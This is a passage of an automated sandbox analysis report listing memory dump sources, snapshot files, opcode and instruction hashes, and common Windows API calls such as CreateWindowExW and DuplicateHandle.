                                                                                                                                                  • Opcode Fuzzy Hash: 40d4a7adb73e4285e73d1d6c74f265e65e6a7b37fc0bc746e150cc1ed889a069
                                                                                                                                                  • Instruction Fuzzy Hash: C841E375E01208CBEB18DFAAD8546DEBBF2BF89300F10C46AC418BB254EB355942CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 287c3c78e396b1c5cd7d60b0e1d863b14c224f068c9e2ed12af4f6083fe5c6fd
                                                                                                                                                  • Instruction ID: 943f0807929cfd94fb67e1f3eee1d7f95df4bb51aa4eb8ec5917e36cb6b3d0d7
                                                                                                                                                  • Opcode Fuzzy Hash: 287c3c78e396b1c5cd7d60b0e1d863b14c224f068c9e2ed12af4f6083fe5c6fd
                                                                                                                                                  • Instruction Fuzzy Hash: 6B41F375E01248CBEB18DFA6D9546DEBBF2AF89300F20C12AC418BB365DB345945CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f00000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0cde1e0876685e947b49692deeca3e855ef167b01b5555dfedc47923aeacd50a
                                                                                                                                                  • Instruction ID: 48e5cef0c928d61bd3df8b865fc438965a413f4dc8d49996a878acc82ec91b19
                                                                                                                                                  • Opcode Fuzzy Hash: 0cde1e0876685e947b49692deeca3e855ef167b01b5555dfedc47923aeacd50a
                                                                                                                                                  • Instruction Fuzzy Hash: 7641F374E002188BEB18CFAAD8546DEBBF2BF89300F14C16AD418BB354EB355946CF94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 45e9e1650156bd9fb8dc1b0e6900da9f0db75dbd986eb5e9f0cbb12a7ff04220
                                                                                                                                                  • Instruction ID: ecc21831a2daf974aead4a1a8230b1d8de933cae433bff5e0c6f5eec2fb6aa0c
                                                                                                                                                  • Opcode Fuzzy Hash: 45e9e1650156bd9fb8dc1b0e6900da9f0db75dbd986eb5e9f0cbb12a7ff04220
                                                                                                                                                  • Instruction Fuzzy Hash: 3831D175E02648CBEB08DFAAD9506DEBBB2BF89300F54C42AD418BB354DB755902CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d84d858c62a223f61c2e0f682501c2beae2811da3e024a930e6b2f4beaf36e0c
                                                                                                                                                  • Instruction ID: 7212d21ebabb261d33b22f604d792e0852830ce57d4a23402227eb77e88efa90
                                                                                                                                                  • Opcode Fuzzy Hash: d84d858c62a223f61c2e0f682501c2beae2811da3e024a930e6b2f4beaf36e0c
                                                                                                                                                  • Instruction Fuzzy Hash: ED31F5B9E05258CFEB08DFA6D8506DEBBB2BF89300F50C52AC419BB254DB744906CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a655264396cb817389d95842e14dd2f8168e2339eb270fc9a2b45309ccf41ea6
                                                                                                                                                  • Instruction ID: cea18fbb44f64f76481c350060826674b7f2de8bf266e47dcf95da425319d047
                                                                                                                                                  • Opcode Fuzzy Hash: a655264396cb817389d95842e14dd2f8168e2339eb270fc9a2b45309ccf41ea6
                                                                                                                                                  • Instruction Fuzzy Hash: 9431E5B5E016088FDB08DFAAC5406DEBBF6AF89300F64C42AD418BB358DB755942CF55
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8fc2cf669cb3a8a3886ffff0b1d6e9fa5a8784a1a56cf90a641a49b5a3bf9be9
                                                                                                                                                  • Instruction ID: 82f46b1d0a5feefd55d1694fd8e3365b83ec461f1aafc5399a764322eeb20ff3
                                                                                                                                                  • Opcode Fuzzy Hash: 8fc2cf669cb3a8a3886ffff0b1d6e9fa5a8784a1a56cf90a641a49b5a3bf9be9
                                                                                                                                                  • Instruction Fuzzy Hash: 8831B475E052588FEB08DFAAD840ADEBBB2AF89300F10D52AD419BB254EB754906CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2be8e6f91c444714ded1dc97c02e72bccfcfadbd53cd66d154628fdcc77a87fc
                                                                                                                                                  • Instruction ID: 8f3d16f5cfc6b14cda92b2de9ab79ed313cbdde8fdb2d370e7c38fc0348af32f
                                                                                                                                                  • Opcode Fuzzy Hash: 2be8e6f91c444714ded1dc97c02e72bccfcfadbd53cd66d154628fdcc77a87fc
                                                                                                                                                  • Instruction Fuzzy Hash: 3431E5B9E056088FDB08DFAAC5406DEBBF2AF89300F24C42AD418BB354DB345902CF94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2c357d3dba4204e9d19c6976832d5f75cffce83e87100af80777e1f1d0bfc170
                                                                                                                                                  • Instruction ID: 9262ca62b6834c6e348e9061b54aa3641a3c6309c09405fb3ca18a63f841ca28
                                                                                                                                                  • Opcode Fuzzy Hash: 2c357d3dba4204e9d19c6976832d5f75cffce83e87100af80777e1f1d0bfc170
                                                                                                                                                  • Instruction Fuzzy Hash: 7F310375E012488BEB08DFAAD941ADEBBF2EF89300F24D42AC419BB354DB745902CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8b43ba59bdf39cfd94d4fdd018532bf6cd0e0a3710d23c4f735ec4efdc2dacdf
                                                                                                                                                  • Instruction ID: bf0f8090d062aa1a1059b086ef15f63c19bdd134cbe338eedeb5ef09c075d9fb
                                                                                                                                                  • Opcode Fuzzy Hash: 8b43ba59bdf39cfd94d4fdd018532bf6cd0e0a3710d23c4f735ec4efdc2dacdf
                                                                                                                                                  • Instruction Fuzzy Hash: BE31E775E012088BEB08DFAAC5416DEBBF3AF89300F64D42AD418BB354EB355942CF94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f00000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bbb212613818518f875ffb5c5041689703463f4fdc77eebf91f9be5c9b9d6608
                                                                                                                                                  • Instruction ID: c6ead0da2d867c1559d3ad7727d22d73c68d953773b73cfd0196b075fe2c672f
                                                                                                                                                  • Opcode Fuzzy Hash: bbb212613818518f875ffb5c5041689703463f4fdc77eebf91f9be5c9b9d6608
                                                                                                                                                  • Instruction Fuzzy Hash: 0E31C274E042188FDB14CFAAD95469EBBB2BF89300F14D56AC418AB254EB754942CF84

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 360BB89E
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 360BB8DB
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 360BB918
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 360BB971
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978620236.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_360b0000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                  • Opcode ID: c41ea48e0d3037dc911056e51b56fedf1d71223d47c8989080e1501392ffefce
                                                                                                                                                  • Instruction ID: 3e733487123c0712291319744c942801cf79964278d446940b60cc2a79406703
                                                                                                                                                  • Opcode Fuzzy Hash: c41ea48e0d3037dc911056e51b56fedf1d71223d47c8989080e1501392ffefce
                                                                                                                                                  • Instruction Fuzzy Hash: 015164B09007498FDB04CFAAC945BDEBFF2EF89300F248499E508A7361DB749945CB62

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 360BB89E
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 360BB8DB
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 360BB918
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 360BB971
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978620236.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_360b0000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                  • Opcode ID: 7ed2dd9da48b7b786d536d3a0ebb1701344acb1d2abe9628ce37e97630586145
                                                                                                                                                  • Instruction ID: 66e25ddfc70c559ef949dd2d32ec846a230c94b89422be5b791e9b48b1c42240
                                                                                                                                                  • Opcode Fuzzy Hash: 7ed2dd9da48b7b786d536d3a0ebb1701344acb1d2abe9628ce37e97630586145
                                                                                                                                                  • Instruction Fuzzy Hash: B65156B0900609CFDB04CFAAC945BDEBBF2EF88300F248499D519A7360DB759941CB66
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978862220.0000000036720000.00000040.00000800.00020000.00000000.sdmp, Offset: 36720000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_36720000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 82ed01d721660067c1bc2bfca32a29e6d2b8572fca5793342605fda908fbad49
                                                                                                                                                  • Instruction ID: 742963a06387638aec4bf3c896548b27fa7168a0ad42a1605c30e2a364824991
                                                                                                                                                  • Opcode Fuzzy Hash: 82ed01d721660067c1bc2bfca32a29e6d2b8572fca5793342605fda908fbad49
                                                                                                                                                  • Instruction Fuzzy Hash: 43F13A74E00209CFEB04DFA9C848B9DBBF2BF88708F958159D505AF265DB74A985CF81
                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 367269C2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978862220.0000000036720000.00000040.00000800.00020000.00000000.sdmp, Offset: 36720000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_36720000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                  • Opcode ID: aa11f6fbaa11b532b4e6b56c983841f2a47fb0ba90f51e477b675141486c1d14
                                                                                                                                                  • Instruction ID: 9552ba91a231d0f07831fdeecfa50d0c024dd342939aa4e5e157d14632421ab9
                                                                                                                                                  • Opcode Fuzzy Hash: aa11f6fbaa11b532b4e6b56c983841f2a47fb0ba90f51e477b675141486c1d14
                                                                                                                                                  • Instruction Fuzzy Hash: FE51E0B5C10359DFDB14CFAAD980ADEBFB2BF48310F64812AE818AB210D7749851CF90
                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 367269C2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978862220.0000000036720000.00000040.00000800.00020000.00000000.sdmp, Offset: 36720000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_36720000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                  • Opcode ID: 721a6d7aff3af2cd7d1913a8e885069c5c8a0370106be21c95d7c14440a390ac
                                                                                                                                                  • Instruction ID: 5011f6c5f4ac97851ff26f0b209b81ecdf7a0d59a4c7f2808c3f49f999455457
                                                                                                                                                  • Opcode Fuzzy Hash: 721a6d7aff3af2cd7d1913a8e885069c5c8a0370106be21c95d7c14440a390ac
                                                                                                                                                  • Instruction Fuzzy Hash: 0A41D0B5D10359DFDB14CFAAC880ADEBBB5BF48310F64812AE818AB210D7749851CF90
                                                                                                                                                  APIs
                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 36728F31
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978862220.0000000036720000.00000040.00000800.00020000.00000000.sdmp, Offset: 36720000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_36720000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                                  • Opcode ID: 476140fffd8deaf5a15cada4a8ddde84a1d5462da993779b815d767173e42ed3
                                                                                                                                                  • Instruction ID: ea010732560f15ac25fd12af921487e8776c90b74819cae2286ee1af4dc1b6a2
                                                                                                                                                  • Opcode Fuzzy Hash: 476140fffd8deaf5a15cada4a8ddde84a1d5462da993779b815d767173e42ed3
                                                                                                                                                  • Instruction Fuzzy Hash: 4A4119B8900305DFDB04CF99C844AAABBF6FB88314F24C459E518AB321D775A845CFA1
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 360BBAEF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978620236.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_360b0000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: cb12104d1c510b92490f98f705fc271ddb489efdd397db4be05b7b576737caf0
                                                                                                                                                  • Instruction ID: 98b64c36ee5a814e3110fe431e2649107525cffb37ba563974ec8dfd6a350347
                                                                                                                                                  • Opcode Fuzzy Hash: cb12104d1c510b92490f98f705fc271ddb489efdd397db4be05b7b576737caf0
                                                                                                                                                  • Instruction Fuzzy Hash: 8321E5B5900248EFDB10CFAAD985ADEFFF4EB48320F14845AE958A3310D774A940CFA5
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 360BBAEF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978620236.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_360b0000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: 236003cc1cb4dd9e3c5d4af776df1f3edbfafde62a92f73f22a26c8fa675decd
                                                                                                                                                  • Instruction ID: 723de6995c86a7ff633eef2de82a006f8e3ef01e41daebbe29da3b1512109eac
                                                                                                                                                  • Opcode Fuzzy Hash: 236003cc1cb4dd9e3c5d4af776df1f3edbfafde62a92f73f22a26c8fa675decd
                                                                                                                                                  • Instruction Fuzzy Hash: 0221C4B5D00248EFDB10CFAAD984ADEBFF4EB48320F14845AE954A7310D374A940CFA5
                                                                                                                                                  APIs
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 3672B40D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978862220.0000000036720000.00000040.00000800.00020000.00000000.sdmp, Offset: 36720000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_36720000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Initialize
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                  • Opcode ID: 0f512373130b596935981a62cf28eee290f3b23693ddb93bbf37c1c2250a55ce
                                                                                                                                                  • Instruction ID: ea68add520a1a5445346911b686432519ae0cfca62555029060ae7aea1afe061
                                                                                                                                                  • Opcode Fuzzy Hash: 0f512373130b596935981a62cf28eee290f3b23693ddb93bbf37c1c2250a55ce
                                                                                                                                                  • Instruction Fuzzy Hash: DE1163B5800348DFCB10CFAAD588BDEBBF4EB48724F10841AD518AB300C334A541CFA6
                                                                                                                                                  APIs
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 3672B40D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978862220.0000000036720000.00000040.00000800.00020000.00000000.sdmp, Offset: 36720000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_36720000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Initialize
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                  • Opcode ID: dab62989f4ca8a2fb3d2bda253baca43c7f725f847137ae6a7eadc836a4e30c9
                                                                                                                                                  • Instruction ID: 9da9388305bbf84ed500e8e5515904095bcd59f95312798fa3fe06e597e5baa5
                                                                                                                                                  • Opcode Fuzzy Hash: dab62989f4ca8a2fb3d2bda253baca43c7f725f847137ae6a7eadc836a4e30c9
                                                                                                                                                  • Instruction Fuzzy Hash: EB11E5B5900748DFDB10DFAAD444B9EBBF4EB48724F14845AD558A7300D378A944CFA5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  • Opcode ID: d60778e87bf42ef5fca7f029837ee30c9826d064ed0773b2b6dbb7c968dc8ec7
                                                                                                                                                  • Instruction ID: f93eb23a83f8155dfcc5c67043a0f68e02e869d5a937073a723f37647ce97778
                                                                                                                                                  • Opcode Fuzzy Hash: d60778e87bf42ef5fca7f029837ee30c9826d064ed0773b2b6dbb7c968dc8ec7
                                                                                                                                                  • Instruction Fuzzy Hash: 1D8105707006009BEB556F78C85936D37A2AFC5360FA08629F8569B7E1CF358D81CB52
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2
                                                                                                                                                  • API String ID: 0-3503038589
                                                                                                                                                  • Opcode ID: 85af9a18ecf9875c689385523aa1edf1413c270d2dc4b32e1c7be4ced179c68f
                                                                                                                                                  • Instruction ID: e159f6316329dd01ff66419b6ccf131911f93637d04e5e7be36e25171ab42a71
                                                                                                                                                  • Opcode Fuzzy Hash: 85af9a18ecf9875c689385523aa1edf1413c270d2dc4b32e1c7be4ced179c68f
                                                                                                                                                  • Instruction Fuzzy Hash: 9741DDB8E15208CFDB04DFA4D994AEDBBF1FB89300F60852AD415B72A0DB345A46CF54
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2
                                                                                                                                                  • API String ID: 0-3503038589
                                                                                                                                                  • Opcode ID: 946bcbf4b4c1fbba5c7787b20fc3a935e7020c73e10ca5fa9cf005ee8ba75107
                                                                                                                                                  • Instruction ID: 679280f36775a73a4077ec0d9a43e2d4eefb600e9114e4a1383e548e454fc136
                                                                                                                                                  • Opcode Fuzzy Hash: 946bcbf4b4c1fbba5c7787b20fc3a935e7020c73e10ca5fa9cf005ee8ba75107
                                                                                                                                                  • Instruction Fuzzy Hash: 4741BDB8E15208CFDB04DFA5D9946EDBBF2FB89300F60842AD415B72A4EB345A46CF54
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: F
                                                                                                                                                  • API String ID: 0-2730988801
                                                                                                                                                  • Opcode ID: c95865f62363589bfe0a7dece56197e594818abd67ec0bec97b669dad45dd391
                                                                                                                                                  • Instruction ID: 0c1ec90e04c080c508ea2e805eba8a14cb323b3f94b222f82845f437d408450a
                                                                                                                                                  • Opcode Fuzzy Hash: c95865f62363589bfe0a7dece56197e594818abd67ec0bec97b669dad45dd391
                                                                                                                                                  • Instruction Fuzzy Hash: 4C312835D093498FCB05DFB9D8446EDBFB4AB4B301F1001AAD454AB261EB351989CBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 264648fb4dc3406ad47b9421cd2210162b22376e99c937a85354deb1b81ba9a4
                                                                                                                                                  • Instruction ID: 26e63c10c7a51314b0e62f0a7fd9546840db8d08f31227c15ccf28972d0fe352
                                                                                                                                                  • Opcode Fuzzy Hash: 264648fb4dc3406ad47b9421cd2210162b22376e99c937a85354deb1b81ba9a4
                                                                                                                                                  • Instruction Fuzzy Hash: 7852EC34A0021CCFEB159BA4D860B9EBB72FF85301F1081A9D51A7B391DF359E869F61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5c6a24d558b9fc8c6048d246ebd59b2e2f5db1da073a626e0cb05f89441aadd5
                                                                                                                                                  • Instruction ID: 263aaed06187c78b2a957f70d30bcd3851d8d37c385a983bbe418ee1c81c49af
                                                                                                                                                  • Opcode Fuzzy Hash: 5c6a24d558b9fc8c6048d246ebd59b2e2f5db1da073a626e0cb05f89441aadd5
                                                                                                                                                  • Instruction Fuzzy Hash: 0E1299350656468FE2542B70EDAC12BBBF5FB0F32B7546CA8F10FC58659B3045CACA62
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b61864d71834fe16ebc8c90e46ecfb2f30b2a26eb1b6cf2c2ca04fb46c5a5bc6
                                                                                                                                                  • Instruction ID: ec85a7c78a95753945ba2039869cf84a82e3f3baf8e0f1877f7a1d569092153c
                                                                                                                                                  • Opcode Fuzzy Hash: b61864d71834fe16ebc8c90e46ecfb2f30b2a26eb1b6cf2c2ca04fb46c5a5bc6
                                                                                                                                                  • Instruction Fuzzy Hash: 2552F675A00219CFDB54EF68DD94A9DBBF2FB88301F5081A9D419A7361DB342E86CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6f5be4c4d63e443658d75ef820a69c568a1a4a89a55ef65c93e724098c6c4666
                                                                                                                                                  • Instruction ID: 1187f0e195321d8ae10281d0bf30c85d4b4c26cc6be0d43c13b71fba0c2b69c2
                                                                                                                                                  • Opcode Fuzzy Hash: 6f5be4c4d63e443658d75ef820a69c568a1a4a89a55ef65c93e724098c6c4666
                                                                                                                                                  • Instruction Fuzzy Hash: D3F11C75A04615CFCB14CFA9D8C59ADBBF2FF88311B1A8059E925AB361CB31EC45CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
